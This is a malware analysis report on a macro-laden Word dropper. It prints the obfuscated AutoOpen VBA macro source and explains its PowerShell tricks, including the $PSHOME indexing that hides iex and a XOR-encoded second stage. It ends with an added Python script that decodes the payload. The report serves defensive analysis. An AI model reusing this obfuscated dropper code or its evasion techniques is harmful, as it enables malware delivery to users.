Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 248e01f5e9b5a1dd…

MALICIOUS

Office (OLE)

Size: 230.5 KB
Created: 2018-06-26 12:55:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 655ba96371ccfc883aca4acb3a5685c2
SHA-1: fa52c8ec2f70db0e8bae5d0e65f93bff8f1768a8
SHA-256: 248e01f5e9b5a1dd5ea5520f6f08cd5bee2642bb4f381475f7af2a0c45b3ad65
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The sample is a Word (OLE) document carrying a VBA project with an AutoOpen entry point, so the macro runs as soon as a user who has enabled macros opens the file. The extracted source calls Shell(), which is why OLE_VBA_SHELL fires as critical: the macro launches an external command rather than merely automating Word. OLE_VBA_PCODE_AUTOEXEC_EXEC corroborates this from the compiled p-code stream, where an auto-execution token sits beside shell/download/object-execution tokens; that finding would hold even if the source had been stripped or failed to extract. The ClamAV signature Doc.Dropper.Agent-6600181-0 classifies the file as a dropper, consistent with the macro's role of launching a second stage.

The visible source is obfuscated in a style common to maldoc campaigns of 2018-2019: functions padded with junk assignments (Sin(), CDate(), unused numerics and references to undefined names), with the real payload split into short string fragments and Chr() calls that are concatenated in one final assignment (jGdMb = AkMnzU + IjPpDrJJR + ... + VmWbDj). Reassembling the fragments shown in the preview yields a PowerShell command line whose visible portion begins Hell .( $PsHOME[4]+$PsHoMe[34]+'x'); whatever precedes "Hell" is assembled outside the excerpt. Because $PSHOME for Windows PowerShell at its default path is C:\Windows\System32\WindowsPowerShell\v1.0, characters 4 and 34 are 'i' and 'e', so the construct evaluates to iex (Invoke-Expression) without the name ever appearing as a literal, which defeats naive keyword matching. The command then clears $OFS (SeT-iTem 'variaBlE:ofs' '') so that a character array joins with no separators, and hands [STrInG]( ... ) a long run of numbers delimited by letters and punctuation ('123j49Q10E7_98{4...'), i.e. an encoded character list. The routine that splits and decodes those numbers, and the Shell() call itself, lie beyond the truncated preview.

Three caveats for the analyst. First, the description attached to OLE_LEGACY_WORDBASIC_AUTOEXEC says no modern VBA project was recovered, but one was (macros.bas, 8392 bytes); read that finding as a second AutoOpen marker, not as evidence of a WordBasic-only document. Second, the single extracted URL is the DrawingML XML namespace, a benign schema identifier found in ordinary Office files, and is not a network indicator. Third, T1203 implies exploitation of a client vulnerability; none of the findings point to one, and execution depends on the user enabling macros, which ATT&CK tracks as T1204.002 (User Execution: Malicious File). T1059.005 fits the evidence.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6600181-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6600181-0
  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8392 bytes
SHA-256: 974e0f526c6300aca245b18e1739703b3942f79f486641b50457e92a08764a93

Script preview (first 1,000 lines of macros.bas):
Attribute VB_Name = "bGLvNzP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mfiEnVvaTPk"
Function jGdMb()
On Error Resume Next
JDmzs = Sin(92883)
lFKIuh = 24245
ZRmarz = CDate(52493)
KwdwrS = 77688
wZXjj = 26947
fqVofi = IlmUKW
AkMnzU = "Hell" + " ." + Chr(40) + " $Ps" + "HOME[4" + "]" + Chr(43) + "$Ps" + "HoMe[" + "34]" + Chr(43) + "'x'" + Chr(41) + " " + Chr(40) + " " + Chr(34) + " $"
JrivuC = CDate(56994)
VtliaL = Sin(82219)
svJjEP = XkwwMd
EswwKA = 14775
CSZnb = 88983
YZCOD = 7576
IjPpDrJJR = Chr(40) + "SeT-iT" + "em 'vari" + "aBlE:ofs" + "' " + "''" + Chr(41) + " " + Chr(34) + Chr(43) + " [ST" + "rInG]" + Chr(40) + " " + "'123j" + "49Q10" + "E7_98{4"
MLdvw = Sin(38044)
oXXna = CDate(47504)
qCnDN = uPWiOD
YImCO = 1297
kzoitX = 49332
iDEhl = 86747
rTXOSFR = "9_58{4" + "0I114" + "v4" + "8Q6" + "1v5" + "3j58" + "I60>43>1" + "27E17" + "E58x43I" + "113I8j5"
huKUYJ = 69260
PYLnal = 4215
tmQjw = 88749
OoPMRc = Sin(64373)
jwHiDz = QkoMVh
TQOGHn = CDate(97978)
IYwKsKHu = "8>61j2" + "8>" + "51{54E58" + "{4" + "9j43" + "E1" + "00>123_6" + "2>26j44_"
TinYuv = 92282
CQLfY = 43832
wJPbL = 97151
IzEBs = Sin(95591)
oIPCBz = iqzqW
ECZfqK = CDate(73751)
hwksrClDRws = "98>1" + "20{5" + "5I43E4" + "3!4" + "7>" + "101" + "!112_1" + "12Q4"
MBfHm = 62833
IRQwR = 87228
VstodC = 42332
fHdwi = Sin(46523)
kTaZX = UrIGB
MkbSa = CDate(39427)
RpYiPN = "0x4" + "0>40" + "E113" + "Q43" + "E45E54x" + "49v" + "54" + "Q43I38{5" + "8_50E47" + "!54x4" + "5j5"
NLcBV = 2071
LRZpRQ = 60584
jfJWUN = 61297
GRUPiP = Sin(58298)
cnwvo = inSnqw
AikUiz = CDate(16238)
arqtzwCXS = "8j113_4" + "8x45" + "{56E" + "112v47" + "{41E6!53" + "!5" + "_42x1" + "3Q112" + "_31Q55v" + "43v43!47"
BLEjtd = 50556
jXublP = 36227
SZFpIo = 69181
wqwWM = Sin(58896)
DzHPbT = SmwhAS
OOhoR = CDate(63987)
VmWbDj = "I101j11" + "2!112E4" + "0_40>" + "40!113" + "_62I49j" + "51" + "v6" + "2>4" + "0Q51" + ">51I6" + "0j113j60"
jGdMb = AkMnzU + IjPpDrJJR + rTXOSFR + IYwKsKHu + hwksrClDRws + RpYiPN + arqtzwCXS + VmWbDj
bzSLVv = 94634
PHMIFV = 42597
qBvOnR = 82620
lYEDC = Sin(68955)
GiNKww = uaQsN
IBjMD = CDate(38337)
End Function
Function oZQlHB()
On Error Resume Next
NHEnGU = 53624
XYTjZ = 10575
psnKzG = 64475
soVrCs = Sin(12529)
tREfV = ivwcAN
XjEpN = CDate(6720)
CkOFNKA = "x48x5" + "0{112I1" + "07" + ">27E47" + "!9E" + "112!3" + "1j55_43_" + "43!47"
mmQBrY = 18293
LpsRf = 70386
GnfWY = 94293
tzNCw = Sin(19210)
jTXij = zrOKC
FCTXLw = CDate(2917)
FPaaASwvDC = "v1" + "01E112I1" + "12_5" + "4v59v58" + "!62{51x" + "61"
cCBlpl = 12089
RtmNzQ = 62336
uAHGq = 44824
IELMnM = Sin(57051)
TUtzW = RjGWH
hCMLll = CDate(76114)
WnKJFirYi = "v62E5" + "1v62Q49Q" + "60!58>1" + "13I55E" + "42Q" + "112x1"
LwrOkv = 1815
povlQ = 72700
KUtQHa = 8065
UhWYom = Sin(10707)
WZhDRS = EMQUIb
MbwwA = CDate(90967)
AJEIcVa = "1Q111!" + "48v8>53I" + "112Q" + "31j55" + "{43I4" + "3x47{101" + "_112I1" + "12v40Q40"
fbFiQ = 61429
cMWiU = 4555
nmCGYO = 69197
CORjn = Sin(99300)
JLcsO = MCinDW
KwvXU = CDate(93998)
ZzqkoD = "_4" + "0I113_51" + "Q38E44Q" + "54E5" + "2I" + "48_4" + "1_11" + "3>45_4" + "2{11" + "2_7I61!1" + "03x59E1" + "02j10"
GLAtnv = 73683
tKvdz = 56336
TWWiw = 30597
KAQCZ = Sin(85909)
JPGGSQ = jWOwEz
KaVjta = CDate(50618)
MqDsRCAvS = "8{21>1" + "12" + "x31{55" + "{4" + "3I43v" + "47j101I1" + "12j112" + "!39v6" + "2!53" + ">57"
NNWBfi = 53203
YPzJZo = 46675
hCXHU = 22545
nlMdmF = Sin(26937)
CNNDEF = fVrSL
LouENp = CDate(26719)
wSJAItnb = "_56" + "E37E11" + "3E6" + "0{48v50Q" + "112!" + "61>10" + "2E26" + "E56E8"
aGjXz = 40177
HOSrN = 54093
fpZITM = 23026
QLkQLk = Sin(15472)
Ecbhp = MXaiir
LYYwz = CDate(32755)
mOOLTUt = "!11" + "2v1" + "20_113Q1" + "2!47x51>" + "54j43" + "I1" + "19>" + "12" + "0I31E12" + "0x118"
OkvOMB = 11200
aiziW = 35486
OtSjz = 44399
EZUwab = Sin(4091)

... (truncated)
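The script below is an added example written for this page; it is not part of the report's tooling or the sample's own code. It takes the string-building assignments from the preview above (copied verbatim, together with three of the junk lines to show they are ignored), evaluates the "..." + Chr(n) + name concatenations the way VBA would, resolves the $PsHOME index trick against the default Windows PowerShell 5.1 path, and XOR-decodes the numeric payload handed to [STrInG](...). The XOR key 0x5F is an inference, not something the page states: the decoding routine sits in the truncated part of the macro, so the key was recovered by assuming the first decoded byte is '$' and checking that the rest comes out as readable PowerShell (it does: a new-object Net.WebClient assignment followed by a quoted http:// string). All function names and the PSHOME constant are mine; only the VBA lines are from the page.

```python
"""Reassemble the concatenated command string from a macros.bas preview and
decode the delimited numeric payload it passes to [String](...).
Added example for this report; the XOR key is an analyst inference."""
import re

# Constructed input: assignments copied from the macros.bas preview on this page.
# The first three are junk lines; the parser drops anything that is not a pure
# string expression, so they never reach the environment.
VBA_SNIPPET = r'''
JDmzs = Sin(92883)
lFKIuh = 24245
fqVofi = IlmUKW
AkMnzU = "Hell" + " ." + Chr(40) + " $Ps" + "HOME[4" + "]" + Chr(43) + "$Ps" + "HoMe[" + "34]" + Chr(43) + "'x'" + Chr(41) + " " + Chr(40) + " " + Chr(34) + " $"
IjPpDrJJR = Chr(40) + "SeT-iT" + "em 'vari" + "aBlE:ofs" + "' " + "''" + Chr(41) + " " + Chr(34) + Chr(43) + " [ST" + "rInG]" + Chr(40) + " " + "'123j" + "49Q10" + "E7_98{4"
rTXOSFR = "9_58{4" + "0I114" + "v4" + "8Q6" + "1v5" + "3j58" + "I60>43>1" + "27E17" + "E58x43I" + "113I8j5"
IYwKsKHu = "8>61j2" + "8>" + "51{54E58" + "{4" + "9j43" + "E1" + "00>123_6" + "2>26j44_"
hwksrClDRws = "98>1" + "20{5" + "5I43E4" + "3!4" + "7>" + "101" + "!112_1" + "12Q4"
RpYiPN = "0x4" + "0>40" + "E113" + "Q43" + "E45E54x" + "49v" + "54" + "Q43I38{5" + "8_50E47" + "!54x4" + "5j5"
arqtzwCXS = "8j113_4" + "8x45" + "{56E" + "112v47" + "{41E6!53" + "!5" + "_42x1" + "3Q112" + "_31Q55v" + "43v43!47"
VmWbDj = "I101j11" + "2!112E4" + "0_40>" + "40!113" + "_62I49j" + "51" + "v6" + "2>4" + "0Q51" + ">51I6" + "0j113j60"
jGdMb = AkMnzU + IjPpDrJJR + rTXOSFR + IYwKsKHu + hwksrClDRws + RpYiPN + arqtzwCXS + VmWbDj
'''

ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
# A VBA string literal (with "" as the escaped quote), a Chr(n) call, a name,
# a concatenation operator, or any other single character (which we reject).
TOKEN = re.compile(r'"((?:[^"]|"")*)"|Chr\((\d+)\)|([A-Za-z_]\w*)|([+&])|(\S)')

# Assumption: Windows PowerShell 5.1 at its default install path.
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"


def eval_string_expr(expr, env):
    """Evaluate an expression built only from literals, Chr(n), known names and +/&.
    Return None for anything else (numbers, Sin(), CDate(), undefined names)."""
    out = []
    for m in TOKEN.finditer(expr):
        kind = m.lastindex
        if kind == 1:
            out.append(m.group(1).replace('""', '"'))
        elif kind == 2:
            out.append(chr(int(m.group(2))))
        elif kind == 3:
            if m.group(3) not in env:
                return None
            out.append(env[m.group(3)])
        elif kind == 4:
            continue
        else:
            return None
    return ''.join(out)


def rebuild_strings(vba_text):
    """Walk the assignments in order and keep every one that resolves to a string."""
    env = {}
    for line in vba_text.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue
        value = eval_string_expr(m.group(2), env)
        if value is not None:
            env[m.group(1)] = value
    return env


def resolve_pshome_trick(cmd):
    """Replace $PSHOME[i]+$PSHOME[j]+'x' with the characters it indexes (here: iex)."""
    pattern = r"\$PSHOME\[(\d+)\]\+\$PSHOME\[(\d+)\]\+'x'"
    return re.sub(pattern,
                  lambda m: PSHOME[int(m.group(1))] + PSHOME[int(m.group(2))] + 'x',
                  cmd, flags=re.IGNORECASE)


def decode_payload(cmd, key=0x5F):
    """Pull the delimited number string passed to [String](...), split on the
    letter/punctuation separators, and XOR each value with the key.
    ASSUMPTION: key 0x5F, inferred because the output is readable PowerShell."""
    m = re.search(r"\[STRING\]\(\s*'(.*)$", cmd, flags=re.IGNORECASE)
    if not m:
        return ''
    return ''.join(chr(int(n) ^ key) for n in re.findall(r'\d+', m.group(1)))


def defang(text):
    """Neuter URLs before the decoded text is pasted into a report."""
    return text.replace('http', 'hxxp')


if __name__ == '__main__':
    env = rebuild_strings(VBA_SNIPPET)
    cmd = env['jGdMb']
    print('reassembled :', resolve_pshome_trick(cmd)[:80], '...')
    print('decoded     :', defang(decode_payload(cmd)))
```

Run it as is: it prints the reassembled command with iex substituted for the index trick, then the decoded, defanged second-stage prefix. The decoded text stops where the preview is truncated, and the separators between the numbers are irrelevant to decoding, which is why a plain digit scan suffices.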